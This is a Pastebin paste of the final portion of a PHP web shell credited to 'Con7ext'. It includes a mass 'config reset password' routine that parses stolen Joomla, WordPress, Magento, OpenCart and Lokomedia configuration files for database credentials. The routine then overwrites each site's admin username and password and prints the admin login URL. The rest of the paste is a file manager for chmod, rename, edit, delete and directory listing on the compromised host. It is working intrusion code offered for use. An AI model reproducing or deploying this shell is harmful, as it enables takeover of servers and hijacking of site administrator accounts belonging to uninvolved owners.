  2098. if($_POST['sikat']) {
  2099.       echo "<center><h1>Config Reset Password</h1>
  2100.     <form method='post'>
  2101.     Link Config: <br>
  2102.     <textarea name='link' style='width: 450px; height:250px;'>";
  2103.     GrabUrl($_POST['linkconfig'],'txt');
  2104.     echo"</textarea><br>
  2105.         User Baru : <input type='text' name='newuser' placeholder='con7ext'> <br><br>
  2106.         Password Baru : <input type='text' name='newpasswd' placeholder='con7ext'><br><br>
  2107.     <input type='submit' style='width: 450px;' name='masschanger' value='Hajar!!'>
  2108.     </form></center>";
  2109.   }else {
  2110.     echo '<center>
  2111.     <h1>Config Reset Password</h1>
  2112.     <form method="post">
  2113.     </select><br>
  2114.     Link Config :<br>
  2115.     <input type="text" name="linkconfig" height="10" style="width: 450px;" placeholder="http://jembod.com/con7ext_symconf/"><br>
  2116.     <input type="submit" style="width: 450px;" name="sikat" value="Change User!!">
  2117.     </form></center>';
  2118.   }
  2119.   if($_POST['masschanger']) {
  2120.     $user = $_POST['newuser'];
  2121.     $pass = $_POST['newpasswd'];
  2122.     $passx = md5($pass);
  2123.     $link = explode("\r\n", $_POST['link']);
  2124.     foreach($link as $file_conf) {
  2125.       $config = file_get_contents($file_conf);
  2126.       if(preg_match("/JConfig|joomla/",$config)) {
  2127.         $dbhost = ambilkata($config,"host = '","'");
  2128.         $dbuser = ambilkata($config,"user = '","'");
  2129.         $dbpass = ambilkata($config,"password = '","'");
  2130.         $dbname = ambilkata($config,"db = '","'");
  2131.         $dbprefix = ambilkata($config,"dbprefix = '","'");
  2132.         $prefix = $dbprefix."users";
  2133.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2134.         $db = mysql_select_db($dbname);
  2135.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2136.         $result = mysql_fetch_array($q);
  2137.         $id = $result['id'];
  2138.         $site = ambilkata($config,"sitename = '","'");
  2139.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  2140.         echo "CMS: Joomla<br>";
  2141.         if($site == '') {
  2142.           echo "Sitename => <font color=red>Error Cok</font><br>";
  2143.         } else {
  2144.           echo "Sitename => $site<br>";
  2145.         }
  2146.         if(!$update OR !$conn OR !$db) {
  2147.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2148.         } else {
  2149.           echo "[+] username: <font color=lime>$user</font><br>";
  2150.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2151.         }
  2152.         mysql_close($conn);
  2153.       } elseif(preg_match("/WordPress/",$config)) {
  2154.         $dbhost = ambilkata($config,"DB_HOST', '","'");
  2155.         $dbuser = ambilkata($config,"DB_USER', '","'");
  2156.         $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2157.         $dbname = ambilkata($config,"DB_NAME', '","'");
  2158.         $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2159.         $prefix = $dbprefix."users";
  2160.         $option = $dbprefix."options";
  2161.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2162.         $db = mysql_select_db($dbname);
  2163.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2164.         $result = mysql_fetch_array($q);
  2165.         $id = $result[ID];
  2166.         $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2167.         $result2 = mysql_fetch_array($q2);
  2168.         $target = $result2[option_value];
  2169.         if($target == '') {
  2170.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2171.         } else {
  2172.           $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2173.         }
  2174.         $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  2175.         echo "CMS: Wordpress<br>";
  2176.         echo $url_target;
  2177.         if(!$update OR !$conn OR !$db) {
  2178.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2179.         } else {
  2180.           echo "[+] username: <font color=lime>$user</font><br>";
  2181.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2182.         }
  2183.         mysql_close($conn);
  2184.       } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2185.         $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2186.         $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2187.         $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2188.         $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2189.         $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2190.         $prefix = $dbprefix."admin_user";
  2191.         $option = $dbprefix."core_config_data";
  2192.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2193.         $db = mysql_select_db($dbname);
  2194.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2195.         $result = mysql_fetch_array($q);
  2196.         $id = $result[user_id];
  2197.         $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2198.         $result2 = mysql_fetch_array($q2);
  2199.         $target = $result2[value];
  2200.         if($target == '') {
  2201.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2202.         } else {
  2203.           $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2204.         }
  2205.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  2206.         echo "CMS: Magento<br>";
  2207.         echo $url_target;
  2208.         if(!$update OR !$conn OR !$db) {
  2209.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2210.         } else {
  2211.           echo "[+] username: <font color=lime>$user</font><br>";
  2212.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2213.         }
  2214.         mysql_close($conn);
  2215.       } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2216.         $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2217.         $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2218.         $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2219.         $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2220.         $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2221.         $prefix = $dbprefix."user";
  2222.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2223.         $db = mysql_select_db($dbname);
  2224.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2225.         $result = mysql_fetch_array($q);
  2226.         $id = $result[user_id];
  2227.         $target = ambilkata($config,"HTTP_SERVER', '","'");
  2228.         if($target == '') {
  2229.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2230.         } else {
  2231.           $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2232.         }
  2233.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  2234.         echo "CMS: OpenCart<br>";
  2235.         echo $url_target;
  2236.         if(!$update OR !$conn OR !$db) {
  2237.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2238.         } else {
  2239.           echo "[+] username: <font color=lime>$user</font><br>";
  2240.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2241.         }
  2242.         mysql_close($conn);
  2243.       } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2244.         $dbhost = ambilkata($config,'server = "','"');
  2245.         $dbuser = ambilkata($config,'username = "','"');
  2246.         $dbpass = ambilkata($config,'password = "','"');
  2247.         $dbname = ambilkata($config,'database = "','"');
  2248.         $prefix = "users";
  2249.         $option = "identitas";
  2250.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2251.         $db = mysql_select_db($dbname);
  2252.         $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2253.         $result = mysql_fetch_array($q);
  2254.         $target = $result[alamat_website];
  2255.         if($target == '') {
  2256.           $target2 = $result[url];
  2257.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2258.           if($target2 == '') {
  2259.             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2260.           } else {
  2261.             $cek_login3 = file_get_contents("$target2/adminweb/");
  2262.             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2263.             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2264.               $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2265.             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2266.               $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2267.             } else {
  2268.               $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2269.             }
  2270.           }
  2271.         } else {
  2272.           $cek_login = file_get_contents("$target/adminweb/");
  2273.           $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2274.           if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2275.             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2276.           } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2277.             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2278.           } else {
  2279.             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2280.           }
  2281.         }
  2282.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  2283.         echo "CMS: Lokomedia<br>";
  2284.         if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2285.           echo $url_target2;
  2286.         } else {
  2287.           echo $url_target;
  2288.         }
  2289.         if(!$update OR !$conn OR !$db) {
  2290.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  2291.         } else {
  2292.           echo "[+] username: <font color=lime>$user</font><br>";
  2293.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  2294.         }
  2295.         mysql_close($conn);
  2296.       }
  2297.     }
  2298.   }    
  2299. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  2300. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  2301. if($_POST['opt'] == 'chmod'){
  2302. if(isset($_POST['perm'])){
  2303. if(chmod($_POST['path'],$_POST['perm'])){
  2304. echo '<font color="green">Success !</font><br/>';
  2305. }else{
  2306. echo '<font color="red">Denied !</font><br />';
  2307. }
  2308. }
  2309. echo '<form method="POST">
  2310. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  2311. <input type="hidden" name="path" value="'.$_POST['path'].'">
  2312. <input type="hidden" name="opt" value="chmod">
  2313. <input type="submit" value="Go" />
  2314. </form>';
  2315. }
  2316. elseif($_POST['opt'] == 'rename'){
  2317. if(isset($_POST['newname'])){
  2318. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  2319. echo '<font color="green">Success !</font><br/>';
  2320. }else{
  2321. echo '<font color="red">Denied !</font><br />';
  2322. }
  2323. $_POST['name'] = $_POST['newname'];
  2324. }
  2325. echo '<form method="POST">
  2326. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  2327. <input type="hidden" name="path" value="'.$_POST['path'].'">
  2328. <input type="hidden" name="opt" value="rename">
  2329. <input type="submit" value="Go" />
  2330. </form>';
  2331. }elseif($_POST['opt'] == 'edit'){
  2332. if(isset($_POST['src'])){
  2333. $fp = fopen($_POST['path'],'w');
  2334. if(fwrite($fp,$_POST['src'])){
  2335. echo '<font color="green">Success !</font><br/>';
  2336. }else{
  2337. echo '<font color="red">Denied !</font><br/>';
  2338. }
  2339. fclose($fp);
  2340. }
  2341. echo '<form method="POST">
  2342. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  2343. <input type="hidden" name="path" value="'.$_POST['path'].'">
  2344. <input type="hidden" name="opt" value="edit">
  2345. <input type="submit" value="Save" />
  2346. </form>';
  2347. }
  2348. echo '</center>';
  2349. }else{
  2350. echo '</table><br/><center>';
  2351. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  2352. if($_POST['type'] == 'dir'){
  2353. if(rmdir($_POST['path'])){
  2354. echo '<font color="green">Success !</font><br/>';
  2355. }else{
  2356. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  2357. }
  2358. }elseif($_POST['type'] == 'file'){
  2359. if(unlink($_POST['path'])){
  2360. echo '<font color="green">Success</font><br/>';
  2361. }else{
  2362. echo '<font color="red">Denied</font><br/>';
  2363. }
  2364. }
  2365. }
  2366. echo '</center>';
  2367. $scandir = scandir($path);
  2368. echo '<div id="content"><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  2369.  
  2370. <tr class="first">
  2371. <td><center>Name</center></td>
  2372. <td><center>Size</center></td>
  2373. <td><center>Permission</center></td>
  2374. <td><center>Action</center></td>
  2375. </tr>';
  2376.  
  2377. foreach($scandir as $dir){
  2378. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  2379. echo '<tr>
  2380. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  2381. <td><center>--</center></td>
  2382. <td><center>';
  2383. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  2384. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  2385. echo perms($path.'/'.$dir);
  2386. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  2387.  
  2388. echo '</center></td>
  2389. <td><center><form method="POST" action="?option&path='.$path.'">
  2390. <select name="opt">
  2391. <option value="">Select</option>
  2392. <option value="delete">Delete</option>
  2393. <option value="chmod">Chmod</option>
  2394. <option value="rename">Rename</option>
  2395. </select>
  2396. <input type="hidden" name="type" value="dir">
  2397. <input type="hidden" name="name" value="'.$dir.'">
  2398. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  2399. <input type="submit" value=">">
  2400. </form></center></td>
  2401. </tr>';
  2402. }
  2403. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  2404. foreach($scandir as $file){
  2405. if(!is_file($path.'/'.$file)) continue;
  2406. $size = filesize($path.'/'.$file)/1024;
  2407. $size = round($size,3);
  2408. if($size >= 1024){
  2409. $size = round($size/1024,2).' MB';
  2410. }else{
  2411. $size = $size.' KB';
  2412. }
  2413.  
  2414. echo '<tr>
  2415. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  2416. <td><center>'.$size.'</center></td>
  2417. <td><center>';
  2418. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  2419. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  2420. echo perms($path.'/'.$file);
  2421. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  2422. echo '</center></td>
  2423. <td><center><form method="POST" action="?option&path='.$path.'">
  2424. <select name="opt">
  2425. <option value="">Select</option>
  2426. <option value="delete">Delete</option>
  2427. <option value="chmod">Chmod</option>
  2428. <option value="rename">Rename</option>
  2429. <option value="edit">Edit</option>
  2430. </select>
  2431. <input type="hidden" name="type" value="file">
  2432. <input type="hidden" name="name" value="'.$file.'">
  2433. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  2434. <input type="submit" value=">">
  2435. </form></center></td>
  2436. </tr>';
  2437. }
  2438. echo '</table>
  2439. </div>';
  2440. }
  2441. echo '<br><br><hr color="#191919"><br><center><br/>Copyright &copy '.date("Y").' <a href="https://www.facebook.com/tokeichun69" target="_blank">Con7ext</a> - <a href="https://www.facebook.com/xaisyndicate" target="_blank">'.$_COPY.'</a></center>
  2442. </body>
  2443. </html>';
  2444. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top